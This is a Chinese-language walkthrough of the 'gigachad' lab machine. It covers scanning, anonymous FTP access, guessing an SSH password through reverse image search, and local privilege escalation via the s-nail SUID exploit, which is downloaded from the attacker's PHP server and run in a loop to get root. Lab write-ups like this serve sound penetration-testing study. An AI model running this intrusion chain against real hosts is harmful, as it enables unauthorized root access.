gigachad - suid

gigachad	easy	ftp利用、google反图搜索、 suid提权、s-nail 提权

主机发现

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo netdiscover -i eth0 -r 192.168.44.138/24

服务探测

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ sudo nmap -sV -A -T 4 -p- 192.168.44.138 |_/kingchad.html

开放了21，22，80
访问http://192.168.44.138//kingchad.html是一张带字的图，翻译

HELL0? IS IT MI5 OR MI6?
他是谁？是军情五处还是军情六处？WHATEVER, SOMEONE IS TRYINGTO HACK US
不管怎么说，有人想黑我们

目录扫描

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ gobuster dir -u http://192.168.44.138/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,php,txt,png -e┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ffuf -u http://192.168.44.138/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -mc 200

很奇怪，扫描到什么就会出现什么，访问都是同一堆字符

访问首页，右键检查源码，解码后没啥用

A7F9B77C16A3AA80DAA4E378659226F628326A95
D82D10564866FD9B201941BCC6C94022196F8EE8 
[md5在线解密破解,md5解密加密](https://www.cmd5.com/)
fuck you
VIRGIN

通过匿名访问获取ftp 权限，里面有一个压缩包
密码：anonymous
get出来，解压出来，得到用户名chad

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ftp 192.168.44.138 //anonymousget chadino
unzip chadino
┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ cat chadinfo 
why yes,
#######################
username is chad
???????????????????????
password?
!!!!!!!!!!!!!!!!!!!!!!!
go to /drippinchad.png

访问http://192.168.44.138/drippinchad.png下载图片

WHY YES, THIS IS MY EAVORITE PLACE TO RELAXHOW AOULD YOU TELL?
翻译
为什么是的，这是我最喜欢放松的地方你怎么知道？

猜测应该是找这个地方
google搜图，谷歌上找到了这个地方叫maidens tower(处女塔)尝试使用这个地方名作为密码登录ssh 居然真成功了。
密码：maidenstower

┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ ssh chad@192.168.44.138 //maidenstower
chad@gigachad:~$ ls
ftp  user.txt
chad@gigachad:~$ cat user.txt
0FAD8F4B099A26E004376EAB42B6A56A

提权

suid提权全解（超细）-CSDN博客
浅谈linux suid提权 - 先知社区

find / -perm -4000 -type f -exec ls -al {} \; 2>/dev/null

这有一个 s-nail 文件，查看漏洞库发现低于 14.8.16 的版本存在漏洞。s-nail是右键管理命令

chad@gigachad:~$ find / -perm -u=s -type f -exec ls -al {} \; 2>/dev/null
-rwsr-xr-x 1 root root 436552 Jan 31  2020 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10104 Jan  1  2016 /usr/lib/s-nail/s-nail-privsep
-rwsr-xr-- 1 root messagebus 51184 Jul  5  2020 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 63736 Jul 27  2018 /usr/bin/passwd
-rwsr-xr-x 1 root root 51280 Jan 10  2019 /usr/bin/mount
-rwsr-xr-x 1 root root 54096 Jul 27  2018 /usr/bin/chfn
-rwsr-xr-x 1 root root 34888 Jan 10  2019 /usr/bin/umount
-rwsr-xr-x 1 root root 44440 Jul 27  2018 /usr/bin/newgrp
-rwsr-xr-x 1 root root 63568 Jan 10  2019 /usr/bin/su
-rwsr-xr-x 1 root root 84016 Jul 27  2018 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 44528 Jul 27  2018 /usr/bin/chsh
chad@gigachad:~$ s-nail -V
v14.8.6

┌──(kali㉿kali)-[~]
└─$ searchsploit s-nail                     
------------------------------------------- ---------------------------------Exploit Title                             |  Path
------------------------------------------- ---------------------------------
S-nail < 14.8.16 - Local Privilege Escalat | multiple/local/47172.sh
------------------------------------------- ---------------------------------
Shellcodes: No Results┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ searchsploit -m multiple/local/47172.shExploit: S-nail < 14.8.16 - Local Privilege EscalationURL: https://www.exploit-db.com/exploits/47172Path: /usr/share/exploitdb/exploits/multiple/local/47172.shCodes: CVE-2017-5899Verified: False
File Type: POSIX shell script, ASCII text executable
cp: overwrite '/home/kali/'$'\346\241\214\351\235\242''/OSCP/47172.sh'? 
Copied to: /home/kali/桌面/OSCP/47172.sh┌──(kali㉿kali)-[~/桌面/OSCP]
└─$ php -S 0.0.0.0:1234
[Thu Apr 18 13:27:20 2024] PHP 8.2.12 Development Server (http://0.0.0.0:1234) started
[Thu Apr 18 13:27:55 2024] 192.168.44.138:40538 Accepted
[Thu Apr 18 13:27:55 2024] 192.168.44.138:40538 [200]: GET /47172.sh
[Thu Apr 18 13:27:55 2024] 192.168.44.138:40538 Closing

由于此漏洞利用在竞争条件下起作用,这里执行一次不能直接提权，可以使用加个循环去执行。

chad@gigachad:~$ wget http://192.168.44.128:1234/47172.sh
chmod +x 47172.sh
while true; do ./47172.sh ;done# cat /root/root.txt
832B123648707C6CD022DD9009AEF2FD